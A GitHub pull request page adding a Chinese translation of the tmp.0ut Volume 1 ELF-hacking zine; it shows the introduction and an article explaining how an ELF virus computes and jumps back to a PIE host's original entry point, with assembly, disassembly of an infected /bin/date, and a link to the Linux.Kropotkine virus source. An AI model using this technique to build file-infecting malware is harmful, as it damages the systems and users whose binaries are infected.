Skip to content

Create zh translation for Volume 1 #23

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
sjwszt wants to merge 9 commits into
base: main
Choose a base branch
from
Open

Create zh translation for Volume 1 #23

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
9 commits
Select commit Hold shift + click to select a range
cc9828f
Create index.html
sjwszt Mar 11, 2025
0bc384f
Add files via upload
sjwszt Mar 11, 2025
6056148
Create index.html
sjwszt Mar 11, 2025
3251d59
Add files via upload
sjwszt Mar 11, 2025
2a35b75
Create index.html
sjwszt Mar 11, 2025
9b84e8d
Create Images
sjwszt Mar 11, 2025
a3c51a4
Delete 1/zh/17/Images
sjwszt Mar 11, 2025
843b94e
Create 1
sjwszt Mar 11, 2025
924d09a
Add files via upload
sjwszt Mar 11, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
65 changes: 65 additions & 0 deletions 1/zh/0.html
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,65 @@
<html>
<head>
<title>tmp.0ut</title>
<meta charset="utf-8">
<style>
body {
color: #FEFEFE;
background-color: #0c0d10;
margin: 0 auto;
padding: 1em 0 1em 0;
}
@font-face { font-family: "gohu"; src: url("../gohu.woff") format('woff'); }
pre { font-family: "gohu", "Lucida Console", monospace, Monaco; font-size: 14px; line-height: 1.0; }
a { color: #93ffd7; text-decoration: none; }
</style>
</head>
<body>
<center><div style="display: inline-block; text-align: left;"><pre>
┌───────────────────────┐
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ │
│ █ █ █ █ █ █ │
│ █ █ █ █ █▀▀▀▀ │
│ █ █ █ █ ▄ │
│ ▄▄▄▄▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄ ▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄▄▄▄▄ │
│ █ │
介绍: │ █ │
~ tmp.0ut 团队: └───────────────────█ ──┘

我等这一刻已经等了很久了。

说实话,我认为很多ELF爱好者都没有想到这一天真的会到来。传统上,我们这些ELF研究者
一直都是局外人。即使在VLAD和90年代末的病毒场景之后,在silvio发表第一篇论文之后,
在unix病毒邮件列表、phrack文章和elfmaster之后,我们的人数和聚集地依然很少且分散。

六个月前,我认识了s01den,我们决定一起进行一些ELF项目。我邀请了我的老朋友TMZ。
一个月后,我们可能有5个人。然后变成了10个。15个。在三个月内,Discord聊天室里已经
有28个人,所有人都在讨论ELF和项目,并准备发布一份杂志 - 这一切发生得太快,我甚至
很难描述它是如何形成的。

我们开始交谈、召开会议和开展项目 - 并且都同意记录我们的旅程将是一个绝妙的主意;
创建一系列可以用来学习的出版物,作为参考指南,也许最终可以将它们组合成一本关于
ELF修改技术和技术的流畅卷册,供下一代ELF爱好者使用。我可以相当确定地说,这很可能
是有史以来最大的一群黑客同时聚在一起,且都在积极从事ELF项目。

带有代码示例的感染算法。具有全新内存加载ELF二进制文件方法的自定义链接器脚本。
二进制高尔夫。从远程源加载内核模块。用Python编写的消毒程序。与传奇人物的访谈。
对迄今为止所见过的最复杂的Linux病毒之一进行39页的重新逆向工程和分析。我写了很多
页想要放入这个等待了20年才写的介绍中的内容,但现在当真正要写的时候,我觉得这些
内容中的大部分应该被省略,或者放在自己的文章中,因为我们令人惊叹的团队和内容本身
就能说明一切。

现在,不再多说,tmp.out、Thugcrowd和Symbolcrash制作组自豪地呈现Mental 'elf
support group(精神'ELF'支持小组)- 由卫生shellcode协会和二进制匪徒后门工厂流浪汉
赞助

~ sblip
</pre></div></center></body></html>
295 changes: 295 additions & 0 deletions 1/zh/1.html
View file
Open in desktop

Large diffs are not rendered by default.

Binary file added 1/zh/10/10.1.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.10.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.11.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.12.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.13.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.14.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.15.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.16.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.17.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.18.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.19.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.2.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.20.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.21.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.22.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.23.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.24.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.25.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.26.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.27.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.28.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.29.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.3.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.30.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.4.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1/zh/10/10.5.png
View file
Open in desktop
Binary file added 1/zh/10/10.6.png
View file
Open in desktop
Binary file added 1/zh/10/10.7.png
View file
Open in desktop
Binary file added 1/zh/10/10.8.png
View file
Open in desktop
Binary file added 1/zh/10/10.9.png
View file
Open in desktop
300 changes: 300 additions & 0 deletions 1/zh/10/index.html
View file
Open in desktop

Large diffs are not rendered by default.

148 changes: 148 additions & 0 deletions 1/zh/11.html
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,148 @@
<html>
<head>
<title>tmp.0ut</title>
<meta charset="utf-8">
<style>
body {
color: #FEFEFE;
background-color: #0c0d10;
margin: 0 auto;
padding: 1em 0 1em 0;
}
@font-face { font-family: "gohu"; src: url("../../gohu.woff") format('woff'); }
pre { font-family: "gohu", "Lucida Console", monospace, Monaco; font-size: 14px; line-height: 1.0; }
a { color: #93ffd7; text-decoration: none; }
</style>
</head>
<body>
<center><div style="display: inline-block; text-align: left;"><pre>
┌───────────────────────┐
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ │
│ █ █ █ █ █ █ │
│ █ █ █ █ █▀▀▀▀ │
│ █ █ █ █ ▄ │
│ ▄▄▄▄▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄ ▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄▄▄▄▄ │
│ █ │
在启用PIE的情况下返回原始入口点 │ █ │
~ S01den └───────────────────█ ──┘

由tmp.out团队的S01den倾情编写!

--- 1) 引言 ---

当我刚开始接触病毒世界时,我最初遇到的困难之一就是如何正确地返回宿主程序的原始入口点。
这是每个称职的病毒都必须具备的核心功能,在过去实现起来非常简单(mov ebx, OEP ; jmp ebx)。

你可能会问:"为什么现在不那么容易了?"

答案只有三个字母:PIE,即位置无关可执行文件(Position Independent Executable)。在
这种二进制文件中,指令的地址在每次执行时都会被随机化(尽管有对齐要求)。因此OEP
不再是一个常量,我们现在必须先计算它才能跳转过去。

让我们来看看该如何做!

--- 2) 在启用PIE的情况下返回OEP ---

我将在这里描述我在Lin64.Kropotkine[0]中用于计算Ret2OEP的方法。
我当时卡了几天,直到看到Elfmaster的一篇论文[1]让我豁然开朗。

以下是代码:

-------------------------------- CUT-HERE ------------------------------------------
mov rcx, r15 ;r15保存了我们的病毒代码存储的地址(在栈中)
add rcx, VXSIZE ; rcx现在包含病毒代码之后的第一个地址
mov dword [rcx], 0xffffeee8 ; 相对调用get_eip(在13字节之前)
mov dword [rcx+4], 0x0d2d48ff ; sub rax, (VXSIZE+5)
mov byte [rcx+8], 0x00000005
mov word [rcx+11], 0x0002d48
mov qword [rcx+13], r9 ; sub rax, entry0
mov word [rcx+17], 0x0000548
mov qword [rcx+19], r12 ; add rax, sym._start
mov dword [rcx+23], 0xfff4894c ; mov rsp, r14
mov word [rcx+27], 0x00e0 ; jmp rax
------------------------------------------------------------------------------------

如你所见,我们逐字节将返回OEP的代码直接写入内存(在病毒代码之后,这样当之前的病毒代码
执行完成后我们就可以跳转到这个例程)。这些字节将被写入宿主程序以进行感染。我们想要
得到这样的结果:

(这段代码来自我用Lin64.Kropotkine感染的/bin/date)

-------------------------------- CUT-HERE ------------------------------------------
; 病毒代码的结尾:
get_rip:
0x0c01ada3 488b0424 mov rax, qword [rsp]
0x0c01ada7 c3 ret
getdot:
0x0c01ada8 e842fbffff call 0xc01a8ef ; 调用main
0x0c01adad 2e0000 add byte cs:[rax], al ; '.'
; &lt;---- 病毒代码结束,我们想在这里注入我们的ret2OEP代码!
; 我们想要在这里得到的代码:
0x0c01adb0 e8eeffffff call 0xc01ada3 ; 调用get_rip &lt;--
0x0c01adb5 482d0d050000 sub rax, 0x50d ; sub rax, (VXSIZE+5)
0x0c01adbb 482da8a8010c sub rax, entry0
0x0c01adc1 4805b0380000 add rax, 0x38b0 ; add rax, sym._start
0x0c01adc7 4c89f4 mov rsp, r14 ; 恢复原始栈
0x0c01adca ffe0 jmp rax
------------------------------------------------------------------------------------

基本上,计算OEP的思路并不复杂。
假设宿主程序原始代码的第一条指令的偏移量(即非随机化的OEP)是0x38b0,并且当我们调用
get_rip时(上面代码中的0x0c01adb0)RIP当前是0x55556156edb5(一个随机化的地址)。
我们需要知道OEP的随机化地址才能跳转到它。

好的,调用get_rip将RIP放入RAX,我们首先需要从RAX(0x55556156edb5)中减去病毒的大小
(加上5,即call get_rip指令的大小)才能得到病毒代码开始的随机化地址:

---&gt; 0x55556156edb5 - (0x508 + 5) = 0x55556156e8a8 ; 病毒代码第一条指令的地址

现在,我们用这个值减去新的入口点,即病毒代码开始的非随机化地址(在病毒执行之前计算得到,
在我们的例子中是0xc01a8a8)。

实际上我们只是简单地做了这个:

---&gt; 随机化的新入口点 - 非随机化的新入口点 (e_hdr.entry)

用我们的值计算如下:

---&gt; 0x55556156e8a8 - 0xc01a8a8 = 0x555555554000

我们进行这个减法是为了提取随机化的"基址"。有了这个值,我们只需要将它加上原始的
e_hdr.entry(非随机化的OEP):

---&gt; 0x555555554000 + 0x38b0 = 0x5555555578b0

你就得到了一个可以跳转的正确地址!
所以jmp rax将开始执行宿主程序的原始代码!

--- 结论 ---
总结一下,我们只是做了这样的事:

---&gt; get_rip() - (VX_SIZE + 5) - new_EP + original-e_hdr.entry

如你所见,就是简单的数学运算!;)
病毒场景万岁!
哪里有权威,哪里就没有自由。
一切为了所有人。
永远向前!

--- 注释和参考文献 ---
[0] https://github.com/vxunderground/MalwareSourceCode
/blob/main/VXUG/Linux.Kropotkine.asm
[1] 现代ELF感染SCOP二进制文件的技术:
https://bitlackeys.org/papers/pocorgtfo20.pdf
- 特别是名为"Note on resolving Elf_Hdr-&gt;e_entry
in PIEexecutables"的部分

--- 源代码 ---

- <a href="../Linux.Kropotkine.asm">Linux.Kropotkine.asm</a>
</pre></div></center></body></html>
Loading